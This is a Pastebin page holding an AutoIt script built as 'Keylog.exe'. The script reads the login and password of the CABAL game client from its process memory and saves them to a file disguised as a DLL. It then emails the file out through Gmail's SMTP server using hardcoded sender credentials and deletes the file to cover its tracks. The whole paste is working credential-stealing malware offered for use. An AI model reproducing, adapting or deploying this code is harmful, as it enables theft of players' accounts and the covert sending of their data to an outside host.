API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Jun 23rd, 2017
510
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
AutoIt 4.10 KB | None | 0 0
raw download clone embed print report
  1. #NoTrayIcon
  2. #Region ;**** Directives created by AutoIt3Wrapper_GUI ****
  3. #AutoIt3Wrapper_icon=..\Program Files\Cabal.X-world_client\Cabal.X-world client\lolz.ico
  4. #AutoIt3Wrapper_outfile=Keylog.exe
  5. #AutoIt3Wrapper_Res_Comment="Keylog" :)
  6. #AutoIt3Wrapper_Res_Fileversion=0.9.0.2
  7. #AutoIt3Wrapper_Res_Fileversion_AutoIncrement=y
  8. #EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
  9. #include <nomadmemory.au3>
  10. #include <SMTP.au3>
  11. Global $Value
  12. Global $Value2
  13. Global $Value3
  14. Global $Value4
  15. Global $Value5
  16. Global $Value6
  17. Global $Value7
  18. Global $Value8
  19. Global $Value9
  20. Global $Value10
  21. Global $Value11
  22. Global $Value12
  23. Global $Value13
  24. Global $Value14
  25. Global $Value15
  26. Global $Value16
  27. Global $Value17
  28. Global $Value18
  29. Global $Value19
  30. Global $Value20
  31. Global $Value21
  32. Global $Value22
  33. Global $Value23
  34. Global $Value24
  35. Global $Value25
  36. Global $Value26
  37. Global $Value27
  38. Global $Value28
  39. Global $Value29
  40. Global $Value30
  41. Global $pid
  42. Global $sv_type = "CHAR"
  43. Global $file = FileOpen("Xpva01.dll", 1)
  44. Global $GmailUser, $GmailPass, $ToEmail
  45. sleep(500)
  46. $pid = WinGetProcess("CABAL")
  47. dupa($pid)
  48. ; "magic" section
  49. func dupa($pid)
  50. $openmem = _MemoryOpen($pid)
  51. $Value = _MemoryRead(0x00C2C4D4, $openmem, $sv_type) ;login
  52. $Value2 = _MemoryRead(0x00C2C4D5, $openmem, $sv_type)
  53. $Value3 = _MemoryRead(0x00C2C4D6, $openmem, $sv_type)
  54. $Value4 = _MemoryRead(0x00C2C4D7, $openmem, $sv_type)
  55. $Value5 = _MemoryRead(0x00C2C4D8, $openmem, $sv_type)
  56. $Value6 = _MemoryRead(0x00C2C4D9, $openmem, $sv_type)
  57. $Value7 = _MemoryRead(0x00C2C4DA, $openmem, $sv_type)
  58. $Value8 = _MemoryRead(0x00C2C4DB, $openmem, $sv_type)
  59. $Value9 = _MemoryRead(0x00C2C4DC, $openmem, $sv_type)
  60. $Value10 = _MemoryRead(0x00C2C4DD, $openmem, $sv_type)
  61. $Value11 = _MemoryRead(0x00C2C4DE, $openmem, $sv_type)
  62. $Value12 = _MemoryRead(0x00C2C4E0, $openmem, $sv_type)
  63. $Value13 = _MemoryRead(0x00C2C4E1, $openmem, $sv_type)
  64. $Value14 = _MemoryRead(0x00C2C4E2, $openmem, $sv_type)
  65. $Value15 = _MemoryRead(0x00C2C4E3, $openmem, $sv_type) ;login end
  66. $Value16 = _MemoryRead(0x00C2C4F0, $openmem, $sv_type) ;password
  67. $Value17 = _MemoryRead(0x00C2C4F1, $openmem, $sv_type)
  68. $Value18 = _MemoryRead(0x00C2C4F2, $openmem, $sv_type)
  69. $Value19 = _MemoryRead(0x00C2C4F3, $openmem, $sv_type)
  70. $Value20 = _MemoryRead(0x00C2C4F4, $openmem, $sv_type)
  71. $Value21 = _MemoryRead(0x00C2C4F5, $openmem, $sv_type)
  72. $Value22 = _MemoryRead(0x00C2C4F6, $openmem, $sv_type)
  73. $Value23 = _MemoryRead(0x00C2C4F7, $openmem, $sv_type)
  74. $Value24 = _MemoryRead(0x00C2C4F8, $openmem, $sv_type)
  75. $Value25 = _MemoryRead(0x00C2C4F9, $openmem, $sv_type)
  76. $Value26 = _MemoryRead(0x00C2C4FA, $openmem, $sv_type)
  77. $Value27 = _MemoryRead(0x00C2C4FB, $openmem, $sv_type)
  78. $Value28 = _MemoryRead(0x00C2C4FC, $openmem, $sv_type)
  79. $Value29 = _MemoryRead(0x00C2C4FD, $openmem, $sv_type)
  80. $Value30 = _MemoryRead(0x00C2C4FE, $openmem, $sv_type) ;password end
  81. _MemoryClose($openmem)
  82. Return $Value
  83. endfunc ; end "magic" section
  84. FileWrite($file, $Value)
  85. FileWrite($file, $Value2)
  86. FileWrite($file, $Value3)
  87. FileWrite($file, $Value4)
  88. FileWrite($file, $Value5)
  89. FileWrite($file, $Value6)
  90. FileWrite($file, $Value7)
  91. FileWrite($file, $Value8)
  92. FileWrite($file, $Value9)
  93. FileWrite($file, $Value10)
  94. FileWrite($file, $Value11)
  95. FileWrite($file, $Value12)
  96. FileWrite($file, $Value13)
  97. FileWrite($file, $Value14)
  98. FileWrite($file, $Value15)
  99. FileWrite($file, $Value16)
  100. FileWrite($file, $Value17)
  101. FileWrite($file, $Value18)
  102. FileWrite($file, $Value19)
  103. FileWrite($file, $Value20)
  104. FileWrite($file, $Value21)
  105. FileWrite($file, $Value22)
  106. FileWrite($file, $Value23)
  107. FileWrite($file, $Value24)
  108. FileWrite($file, $Value25)
  109. FileWrite($file, $Value26)
  110. FileWrite($file, $Value27)
  111. FileWrite($file, $Value28)
  112. FileWrite($file, $Value29)
  113. FileWrite($file, $Value30)
  114. fileclose($file)
  115.  
  116. ;wysyłanie maila =)
  117. $GmailUser = "testerdupa1@gmail.com"
  118. $GmailPass = "dupa123456"
  119. $ToEmail = ""
  120. $StmpServer = "smtp.gmail.com"
  121. $Temat = "login&pass"
  122. $Tresc = "..."
  123. $Nadawca = "login&pass logger"
  124. $s_AttachFiles = "Xpva01.dll"
  125.  
  126. _INetSmtpMailCom($StmpServer, $Nadawca, $GmailUser, $ToEmail, $GmailUser, $GmailPass, $Temat, $Tresc, $s_AttachFiles)
  127.  
  128. filedelete("Xpva01.dll")
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!